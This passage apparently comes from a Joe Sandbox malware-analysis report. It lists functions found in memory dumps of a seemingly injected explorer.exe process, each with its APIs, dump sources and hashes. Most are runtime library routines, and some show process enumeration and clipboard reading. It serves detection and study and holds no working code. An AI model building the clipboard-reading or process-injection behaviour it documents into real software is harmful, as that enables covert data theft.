                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                        • Instruction ID: 590c2699db920aeaa161a7524a7630c85feb7fe16ee9b9140d90af6cae5ad4b8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E411A56221868452DF20DB29E89436AB365FBC53D4F85C221DB9D47798DF6CCA05CB10
                                                                                                                                                                                                                        Function 0DF09EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                        • Instruction ID: ccdbc8eed55b339cf5f905bfef8f94d5be5a7bd56561c14d3e6c3bdcf5e19dc3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09e9fd014ecaad60baa62fbe240b46a2e6e0872ee412f7ebd71e4c3451ce10d3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB11D82221868452DE10DB19E88436A7765FBC9390F89C221DB9D476D8EF6CC905DF10
                                                                                                                                                                                                                        Function 0B0B9EA0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 5234a5cb9d4af242c6d48e2eff22f77f773641afb7f067bc0787645928691682
                                                                                                                                                                                                                        • Instruction ID: 2f22d6aff32f8a289125709b69f9bd102dee6bb2a7a4e76ac663fc66f4ff5fb5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5234a5cb9d4af242c6d48e2eff22f77f773641afb7f067bc0787645928691682
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6511DA223146854BDE68DB25E4957EA7365F7C97E4F840221DB9D47798DF3CC504CB00
                                                                                                                                                                                                                        Function 0DFE7960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction ID: 3e7fe3d4bcdde85ab07a5a04b1b748596c441de0b9b3a6a6ce7dada7d2c94b31
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11017C21B19A8182EE099B6AF9443396361EF88FC4F0894759E5B0B764DF38C4968704
                                                                                                                                                                                                                        Function 0DF07960 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction ID: 5178c38638e7f138933cde213a51336f69f212410988c481c25eba436d58b134
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f6fdb9662fdaab80e8b146d8066cb7615450abca20b9742a7ef6fa3840ebc62
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68018F22B19B8282EE09DB6AF9443396361AB89FC4F099076DE5B07754DF3CD1818714
                                                                                                                                                                                                                        Function 00B5C151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: d37ef9eba7827c1ae13b56cd5df5e93f9b9282e057b3a64e02174de237dd928e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF08235128E0A9FCBA4FBACC0C2B79B6D1FB4C301F5845FCA948D720BDA3498458B51
                                                                                                                                                                                                                        Function 02BFC151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: 1191e8e4f711352549cfa888b0265d43e0ba3493dffdbbf4438cb5dd5d8e297a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9F0FE3512890E9FDBE4FBA8C0C5B696691FB5C304F4945E9924CC7246DA2099D88B91
                                                                                                                                                                                                                        Function 0B9AC151 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: c4db4a1cfb676700f146f1bfd405aa38a72f412c844b2a08819c983631f36692
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DF01235228D1A9FCBA4FB68C5D6B6976A4FB8C704F4985ACD548DB20ADA2098408BD1
                                                                                                                                                                                                                        Function 0DFEC81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFEC829
                                                                                                                                                                                                                          • Part of subcall function 0DFEF930: _getptd_noexit.LIBCMT ref: 0DFEF936
                                                                                                                                                                                                                          • Part of subcall function 0DFEF930: _amsg_exit.LIBCMT ref: 0DFEF946
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFEC837
                                                                                                                                                                                                                          • Part of subcall function 0DFF2214: DecodePointer.KERNEL32 ref: 0DFF221F
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFEC83C
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFEC858
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFEC868
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: ddced5826ed5e60f0f7ca9eb4cf53758be07ac5f1c3155b522d41e3425b8e212
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8E0302261968092CE15AB6DE6401BD7260EF88BC8F4DC135EBC94B215DE20C991C350
                                                                                                                                                                                                                        Function 0DF0C81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF0C829
                                                                                                                                                                                                                          • Part of subcall function 0DF0F930: _getptd_noexit.LIBCMT ref: 0DF0F936
                                                                                                                                                                                                                          • Part of subcall function 0DF0F930: _amsg_exit.LIBCMT ref: 0DF0F946
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DF0C837
                                                                                                                                                                                                                          • Part of subcall function 0DF12214: DecodePointer.KERNEL32 ref: 0DF1221F
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF0C83C
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DF0C858
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF0C868
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: 7ae94f9fc5a5c5392625bdb2241d1480e40825ccd535713701fcf6609b000b52
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84E065236185C091CE25ABADE6411BD7BA0EF48F88F4DC235CB890B285DE20C891E358
                                                                                                                                                                                                                        Function 0B0BC81C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0BC829
                                                                                                                                                                                                                          • Part of subcall function 0B0BF930: _getptd_noexit.LIBCMT ref: 0B0BF936
                                                                                                                                                                                                                          • Part of subcall function 0B0BF930: _amsg_exit.LIBCMT ref: 0B0BF946
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0B0BC837
                                                                                                                                                                                                                          • Part of subcall function 0B0C2214: DecodePointer.KERNEL32 ref: 0B0C221F
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0BC83C
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0B0BC858
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0BC868
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction ID: e8c8e20e47fa560da42cc2e3f66ff634558c2087d091f938c795b08b54090f36
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61bca0dd4608908eb0512177bd15a75f1269e8d04e6fb55e5b32108654824d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E06522210581B4EE6D6F65E1419ED6361E788F84F0C8135DB890B705DE60C4A1C364
                                                                                                                                                                                                                        Function 00B67741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B6775A
                                                                                                                                                                                                                          • Part of subcall function 00B5F4DD: _getptd_noexit.LIBCMT ref: 00B5F4E1
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00B67766
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 00B6778D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction ID: fadfceea59627bacd2f471a0ac1571542bd1eeaff35c5fd40422c600b7153782
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F2126206ADEC94EF31A6B3858C47353AD5EB9B30DF2840F98486CB217DD6E8C428752
                                                                                                                                                                                                                        Function 02C07741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C0775A
                                                                                                                                                                                                                          • Part of subcall function 02BFF4DD: _getptd_noexit.LIBCMT ref: 02BFF4E1
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 02C07766
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 02C0778D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction ID: af8eeba57417b36cd090dfac0441b201b5973820ce014ab34ba3dff70ce41679
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B212C2061CEC84EE71F673C48C4335BAD6EBDB289F1840E9C486CB296DA55B94AC752
                                                                                                                                                                                                                        Function 0B9B7741 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B775A
                                                                                                                                                                                                                          • Part of subcall function 0B9AF4DD: _getptd_noexit.LIBCMT ref: 0B9AF4E1
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0B9B7766
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0B9B778D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction ID: fe6668120b9c08325a8f264bc15ca1886768b391c57605d7aff9410e312cae6c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a9780020d5f1d50c68b03fcb33533110226140a65e0ddf9756409dcc418be2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37212C2061CEC84EE31767B845C4B753ED9EBDB609F1802E9C496CB236DD598D028352
                                                                                                                                                                                                                        Function 0DFEB8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0DFEB902
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DFEB90E
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: _FF_MSGBANNER.LIBCMT ref: 0DFEC2DC
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: _NMSG_WRITE.LIBCMT ref: 0DFEC2E6
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: HeapAlloc.KERNEL32 ref: 0DFEC301
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: _callnewh.LIBCMT ref: 0DFEC31A
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: _errno.LIBCMT ref: 0DFEC325
                                                                                                                                                                                                                          • Part of subcall function 0DFEC2AC: _errno.LIBCMT ref: 0DFEC330
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DFEB957
                                                                                                                                                                                                                          • Part of subcall function 0DFEC374: RtlPcToFileHeader.NTDLL ref: 0DFEC403
                                                                                                                                                                                                                          • Part of subcall function 0DFEC374: RaiseException.KERNEL32 ref: 0DFEC442
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction ID: 6dfb4a9fdde992bd43bd0ecc1b17642bbfbc31b29db86c15f1772a458ded7556
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9601B522709B8994DF249B59F984368B354E7997C8F488421DF8D0BB25EE7CC6D5C700
                                                                                                                                                                                                                        Function 0DF0B8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0DF0B902
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0DF0B90E
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: _FF_MSGBANNER.LIBCMT ref: 0DF0C2DC
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: _NMSG_WRITE.LIBCMT ref: 0DF0C2E6
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: HeapAlloc.KERNEL32 ref: 0DF0C301
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: _callnewh.LIBCMT ref: 0DF0C31A
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: _errno.LIBCMT ref: 0DF0C325
                                                                                                                                                                                                                          • Part of subcall function 0DF0C2AC: _errno.LIBCMT ref: 0DF0C330
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DF0B957
                                                                                                                                                                                                                          • Part of subcall function 0DF0C374: RtlPcToFileHeader.NTDLL ref: 0DF0C403
                                                                                                                                                                                                                          • Part of subcall function 0DF0C374: RaiseException.KERNEL32 ref: 0DF0C442
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction ID: c84bef91d4770a42dc2f26e2ec1775e277fdde4bbd66ebb808285fe5ecf02643
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9901B521719B4A91DF249B99F980378B754E7897C8F48C421DF8D0BBA4EE3CC695D700
                                                                                                                                                                                                                        Function 0B0BB8F4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _callnewh.LIBCMT ref: 0B0BB902
                                                                                                                                                                                                                        • malloc.LIBCMT ref: 0B0BB90E
